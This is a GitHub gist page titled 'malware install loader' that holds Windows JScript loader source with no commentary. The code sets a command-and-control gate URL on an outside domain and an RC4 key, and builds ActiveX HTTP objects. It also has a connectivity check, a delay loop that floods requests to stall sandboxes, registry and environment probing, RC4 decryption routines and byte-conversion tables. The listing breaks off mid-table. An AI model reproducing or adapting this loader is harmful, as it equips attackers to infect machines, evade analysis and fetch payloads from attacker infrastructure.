Created
March 5, 2019 09:47
-
-
Save seclib/70be9b0d75a4e740388a257b2cec145e to your computer and use it in GitHub Desktop.
malware install loader
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var BV = "6.0"; | |
| var Gate = "https://tonsandmillions.com/sendanalytics-28529/info"; | |
| var hit_each = 1; | |
| var error_retry = 2; | |
| var restart_h = 4; | |
| var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each); | |
| var Rkey = "ZkY3egXBulkogSbGEHqA"; | |
| var rcon_now = 0; | |
| var gtfo = false; | |
| var selfdel = false; | |
| var table = []; | |
| var Build = ""; | |
| var PCN = ""; | |
| var UNM = ""; | |
| var SYSTEM = 0; | |
| var rootK = "HKCU"; | |
| var workingDir = ""; | |
| var main_mitm = ""; | |
| var xApp = ""; | |
| var xTmp = ""; | |
| var PreserveH = ""; | |
| var xStore = ""; | |
| var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"'; | |
| function obj(xString) { | |
| return new ActiveXObject(xString); | |
| } | |
| var con; | |
| try { | |
| con = obj("Msxml2.XMLHTTP.6.0"); | |
| } catch (e) { | |
| try { | |
| con = obj("Msxml2.XMLHTTP.3.0"); | |
| } catch (e2) { | |
| con = obj("Microsoft.XMLHTTP"); | |
| } | |
| } | |
| var xhr; | |
| try { | |
| xhr = obj("Msxml2.ServerXMLHTTP.6.0"); | |
| } catch (e3) { | |
| xhr = obj("Msxml2.ServerXMLHTTP.3.0"); | |
| } | |
| function check_Net(method) { | |
| var Resp = false; | |
| var conz1; | |
| var t11 = ""; | |
| if (method === 1) { | |
| conz1 = xhr; | |
| } else { | |
| conz1 = con; | |
| } | |
| try { | |
| conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false); | |
| } catch (e1) { | |
| if (method === 0) { | |
| return check_Net(1); | |
| } else { | |
| return false; | |
| } | |
| } | |
| conz1.onreadystatechange = function() { | |
| if (conz1.readyState === 4) { | |
| if (conz1.status === 200) { | |
| t11 = conz1.responseText; | |
| if (t11) { | |
| if (t11 == 'This is another XSL namespace\n') { | |
| Resp = true; | |
| } else { | |
| Resp = false; | |
| } | |
| } else { | |
| Resp = false; | |
| } | |
| } else { | |
| Resp = false; | |
| } | |
| } | |
| }; | |
| try { | |
| conz1.send(); | |
| } catch (e2) { | |
| if (method === 0) { | |
| return check_Net(1); | |
| } else { | |
| return false; | |
| } | |
| } | |
| return Resp; | |
| } | |
| function cLength(mstr, min, max) { | |
| var n = mstr.length; | |
| if (n === 0) { | |
| return false; | |
| } | |
| if (n >= min && (n <= max)) { | |
| return true; | |
| } | |
| } | |
| function rInt(min, max) { | |
| min = Math.ceil(min); | |
| max = Math.floor(max); | |
| return Math.floor(Math.random() * (max - min + 1)) + min; | |
| } | |
| function rStr(len) { | |
| var xRnd = ""; | |
| var i; | |
| var randomPoz; | |
| var charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; | |
| i = 0; | |
| do { | |
| randomPoz = Math.floor(Math.random() * charSet.length); | |
| xRnd += charSet.substring(randomPoz, randomPoz + 1); | |
| i += 1; | |
| } while (i < len); | |
| return xRnd; | |
| } | |
| function fuck_js() { | |
| var xNow = rInt(8, 32); | |
| var rNow = rStr(xNow); | |
| try { | |
| xhr.setTimeouts(5000, 5000, 10000, 10000); | |
| xhr.open("GET", "http://8.8.8.8/" + rNow, false); | |
| xhr.send(); | |
| } catch (e9) { | |
| return false; | |
| } | |
| } | |
| function waitfor(zMinute) { | |
| var limit = Date.parse(Date()) + (zMinute * 60000); | |
| while (Date.parse(Date()) < limit) { | |
| fuck_js(); | |
| } | |
| main(); | |
| } | |
| function waitfor2(zMinute, iGo) { | |
| var xlmt; | |
| xlmt = Date.parse(Date()) + (zMinute * 60000); | |
| while (Date.parse(Date()) < xlmt) { | |
| fuck_js(); | |
| } | |
| if (iGo === 1) { | |
| go(); | |
| } | |
| } | |
| function fexist(xpath) { | |
| var fso; | |
| try { | |
| fso = obj("Scripting.FileSystemObject"); | |
| if (fso.FileExists(xpath)) { | |
| return true; | |
| } else { | |
| return false; | |
| } | |
| } catch (feer) { | |
| return false; | |
| } | |
| } | |
| function rexist(xpath) { | |
| var sh; | |
| var rdata; | |
| try { | |
| sh = obj("Wscript.shell"); | |
| rdata = sh.RegRead(xpath); | |
| if (rdata !== null) { | |
| return true; | |
| } | |
| } catch (e71) { | |
| return false; | |
| } | |
| } | |
| function myEnv(xVar, xSystem) { | |
| var a1; | |
| var rEnv; | |
| a1 = obj("WScript.Shell"); | |
| if (xSystem === 1) { | |
| rEnv = a1.environment("SYSTEM"); | |
| } else { | |
| rEnv = a1.environment("PROCESS"); | |
| } | |
| return rEnv(xVar); | |
| } | |
| function myBits() { | |
| var xBits; | |
| xBits = myEnv("PROCESSOR_ARCHITECTURE", 1); | |
| if (xBits === "AMD64") { | |
| return "64"; | |
| } else { | |
| return "86"; | |
| } | |
| } | |
| function zzzz4(key, str) { | |
| var s = []; | |
| var j = 0; | |
| var x; | |
| var res = ""; | |
| var i; | |
| var y; | |
| if (key && str) { | |
| i = 0; | |
| do { | |
| s[i] = i; | |
| i += 1; | |
| } while (i < 256); | |
| i = 0; | |
| do { | |
| j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| i += 1; | |
| } while (i < 256); | |
| i = 0; | |
| j = 0; | |
| y = 0; | |
| do { | |
| i = (i + 1) % 256; | |
| j = (j + s[i]) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]); | |
| y += 1; | |
| } while (y < str.length); | |
| } | |
| return res; | |
| } | |
| function zzz4Bytes(xArray, key) { | |
| var s = []; | |
| var j = 0; | |
| var x; | |
| var outBytes = []; | |
| var i; | |
| var y; | |
| if (key && xArray) { | |
| i = 0; | |
| do { | |
| s[i] = i; | |
| i += 1; | |
| } while (i < 256); | |
| i = 0; | |
| do { | |
| j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| i += 1; | |
| } while (i < 256); | |
| i = 0; | |
| j = 0; | |
| y = 0; | |
| do { | |
| i = (i + 1) % 256; | |
| j = (j + s[i]) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| outBytes.push(xArray[y] ^ s[(s[i] + s[j]) % 256]); | |
| y += 1; | |
| } while (y < xArray.length); | |
| } | |
| return outBytes; | |
| } | |
| function tB(htc) { | |
| var y = []; | |
| y[0xC7] = 0x80; | |
| y[0xFC] = 0x81; | |
| y[0xE9] = 0x82; | |
| y[0xE2] = 0x83; | |
| y[0xE4] = 0x84; | |
| y[0xE0] = 0x85; | |
| y[0xE5] = 0x86; | |
| y[0xE7] = 0x87; | |
| y[0xEA] = 0x88; | |
| y[0xEB] = 0x89; | |
| y[0xE8] = 0x8A; | |
| y[0xEF] = 0x8B; | |
| y[0xEE] = 0x8C; | |
| y[0xEC] = 0x8D; | |
| y[0xC4] = 0x8E; | |
| y[0xC5] = 0x8F; | |
| y[0xC9] = 0x90; | |
| y[0xE6] = 0x91; | |
| y[0xC6] = 0x92; | |
| y[0xF4] = 0x93; | |
| y[0xF6] = 0x94; | |
| y[0xF2] = 0x95; | |
| y[0xFB] = 0x96; | |
| y[0xF9] = 0x97; | |
| y[0xFF] = 0x98; | |
| y[0xD6] = 0x99; | |
| y[0xDC] = 0x9A; | |
| y[0xA2] = 0x9B; | |
| y[0xA3] = 0x9C; | |
| y[0xA5] = 0x9D; | |
| y[0x20A7] = 0x9E; | |
| y[0x192] = 0x9F; | |
| y[0xE1] = 0xA0; | |
| y[0xED] = 0xA1; | |
| y[0xF3] = 0xA2; | |
| y[0xFA] = 0xA3; | |
| y[0xF1] = 0xA4; | |
| y[0xD1] = 0xA5; | |
| y[0xAA] = 0xA6; | |
| y[0xBA] = 0xA7; | |
| y[0xBF] = 0xA8; | |
| y[0x2310] = 0xA9; | |
| y[0xAC] = 0xAA; | |
| y[0xBD] = 0xAB; | |
| y[0xBC] = 0xAC; | |
| y[0xA1] = 0xAD; | |
| y[0xAB] = 0xAE; | |
| y[0xBB] = 0xAF; | |
| y[0x2591] = 0xB0; | |
| y[0x2592] = 0xB1; | |
| y[0x2593] = 0xB2; | |
| y[0x2502] = 0xB3; | |
| y[0x2524] = 0xB4; | |
| y[0x2561] = 0xB5; | |
| y[0x2562] = 0xB6; | |
| y[0x2556] = 0xB7; | |
| y[0x2555] = 0xB8; | |
| y[0x2563] = 0xB9; | |
| y[0x2551] = 0xBA; | |
| y[0x2557] = 0xBB; | |
| y[0x255D] = 0xBC; | |
| y[0x255C] = 0xBD; | |
| y[0x255B] = 0xBE; | |
| y[0x2510] = 0xBF; | |
| y[0x2514] = 0xC0; | |
| y[0x2534] = 0xC1; | |
| y[0x252C] = 0xC2; | |
| y[0x251C] = 0xC3; | |
| y[0x2500] = 0xC4; | |
| y[0x253C] = 0xC5; | |
| y[0x255E] = 0xC6; | |
| y[0x255F] = 0xC7; | |
| y[0x255A] = 0xC8; | |
| y[0x2554] = 0xC9; | |
| y[0x2569] = 0xCA; | |
| y[0x2566] = 0xCB; | |
| y[0x2560] = 0xCC; | |
| y[0x2550] = 0xCD; | |
| y[0x256C] = 0xCE; | |
| y[0x2567] = 0xCF; | |
| y[0x2568] = 0xD0; | |
| y[0x2564] = 0xD1; | |
| y[0x2565] = 0xD2; | |
| y[0x2559] = 0xD3; | |
| y[0x2558] = 0xD4; | |
| y[0x2552] = 0xD5; | |
| y[0x2553] = 0xD6; | |
| y[0x256B] = 0xD7; | |
| y[0x256A] = 0xD8; | |
| y[0x2518] = 0xD9; | |
| y[0x250C] = 0xDA; | |
| y[0x2588] = 0xDB; | |
| y[0x2584] = 0xDC; | |
| y[0x258C] = 0xDD; | |
| y[0x2590] = 0xDE; | |
| y[0x2580] = 0xDF; | |
| y[0x3B1] = 0xE0; | |
| y[0xDF] = 0xE1; | |
| y[0x393] = 0xE2; | |
| y[0x3C0] = 0xE3; | |
| y[0x3A3] = 0xE4; | |
| y[0x3C3] = 0xE5; | |
| y[0xB5] = 0xE6; | |
| y[0x3C4] = 0xE7; | |
| y[0x3A6] = 0xE8; | |
| y[0x398] = 0xE9; | |
| y[0x3A9] = 0xEA; | |
| y[0x3B4] = 0xEB; | |
| y[0x221E] = 0xEC; | |
| y[0x3C6] = 0xED; | |
| y[0x3B5] = 0xEE; | |
| y[0x2229] = 0xEF; | |
| y[0x2261] = 0xF0; | |
| y[0xB1] = 0xF1; | |
| y[0x2265] = 0xF2; | |
| y[0x2264] = 0xF3; | |
| y[0x2320] = 0xF4; | |
| y[0x2321] = 0xF5; | |
| y[0xF7] = 0xF6; | |
| y[0x2248] = 0xF7; | |
| y[0xB0] = 0xF8; | |
| y[0x2219] = 0xF9; | |
| y[0xB7] = 0xFA; | |
| y[0x221A] = 0xFB; | |
| y[0x207F] = 0xFC; | |
| y[0xB2] = 0xFD; | |
| y[0x25A0] = 0xFE; | |
| y[0xA0] = 0xFF; | |
| var ami = []; | |
| var mi; | |
| var renderer; | |
| var atends; | |
| mi = 0; | |
| do { | |
| renderer = htc.charCodeAt(mi); | |
| if (renderer < 128) { | |
| atends = renderer; | |
| } else { | |
| atends = y[renderer]; | |
| } | |
| ami.push(atends); | |
| mi += 1; | |
| } while (mi < htc.length); | |
| return ami; | |
| } | |
| function tS(arenderer) { | |
| var x = []; | |
| x[0x80] = 0x00C7; | |
| x[0x81] = 0x00FC; | |
| x[0x82] = 0x00E9; | |
| x[0x83] = 0x00E2; | |
| x[0x84] = 0x00E4; | |
| x[0x85] = 0x00E0; | |
| x[0x86] = 0x00E5; | |
| x[0x87] = 0x00E7; | |
| x[0x88] = 0x00EA; | |
| x[0x89] = 0x00EB; | |
| x[0x8A] = 0x00E8; | |
| x[0x8B] = 0x00EF; | |
| x[0x8C] = 0x00EE; | |
| x[0x8D] = 0x00EC; | |
| x[0x8E] = 0x00C4; | |
| x[0x8F] = 0x00C5; | |
| x[0x90] = 0x00C9; | |
| x[0x91] = 0x00E6; | |
| x[0x92] = 0x00C6; | |
| x[0x93] = 0x00F4; | |
| x[0x94] = 0x00F6; | |
| x[0x95] = 0x00F2; | |
| x[0x96] = 0x00FB; | |
| x[0x97] = 0x00F9; | |
| x[0x98] = 0x00FF; | |
| x[0x99] = 0x00D6; | |
| x[0x9A] = 0x00DC; | |
| x[0x9B] = 0x00A2; | |
| x[0x9C] = 0x00A3; | |
| x[0x9D] = 0x00A5; | |
| x[0x9E] = 0x20A7; | |
| x[0x9F] = 0x0192; | |
| x[0xA0] = 0x00E1; | |
| x[0xA1] = 0x00ED; | |
| x[0xA2] = 0x00F3; | |
| x[0xA3] = 0x00FA; | |
| x[0xA4] = 0x00F1; | |
| x[0xA5] = 0x00D1; | |
| x[0xA6] = 0x00AA; | |
| x[0xA7] = 0x00BA; | |
| x[0xA8] = 0x00BF; | |
| x[0xA9] = 0x2310; | |
| x[0xAA] = 0x00AC; | |
| x[0xAB] = 0x00BD; | |
| x[0xAC] = 0x00BC; | |
| x[0xAD] = 0x00A1; | |
| x[0xAE] = 0x00AB; | |
| x[0xAF] = 0x00BB; | |
| x[0xB0] = 0x2591; | |
| x[0xB1] = 0x2592; | |
| x[0xB2] = 0x2593; | |
| x[0xB3] = 0x2502; | |
| x[0xB4] = 0x2524; | |
| x[0xB5] = 0x2561; | |
| x[0xB6] = 0x2562; | |
| x[0xB7] = 0x2556; | |
| x[0xB8] = 0x2555; | |
| x[0xB9] = 0x2563; | |
| x[0xBA] = 0x2551; | |
| x[0xBB] = 0x2557; | |
| x[0xBC] = 0x255D; | |
| x[0xBD] = 0x255C; | |
| x[0xBE] = 0x255B; | |
| x[0xBF] = 0x2510; | |
| x[0xC0] = 0x2514; | |
| x[0xC1] = 0x2534; | |
| x[0xC2] = 0x252C; | |
| x[0xC3] = 0x251C; | |
| x[0xC4] = 0x2500; | |
| x[0xC5] = 0x253C; | |
| x[0xC6] = 0x255E; | |
| x[0xC7] = 0x255F; | |
| x[0xC8] = 0x255A; | |
| x[0xC9] = 0x2554; | |
| x[0xCA] = 0x2569; | |
| x[0xCB] = 0x2566; | |
| x[0xCC] = 0x2560; | |
| x[0xCD] = 0x2550; | |
| x[0xCE] = 0x256C; | |
| x[0xCF] = 0x2567; | |
| x[0xD0] = 0x2568; | |
| x[0xD1] = 0x2564; | |
| x[0xD2] = 0x2565; | |
| x[0xD3] = 0x2559; | |
| ... | |
| // |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment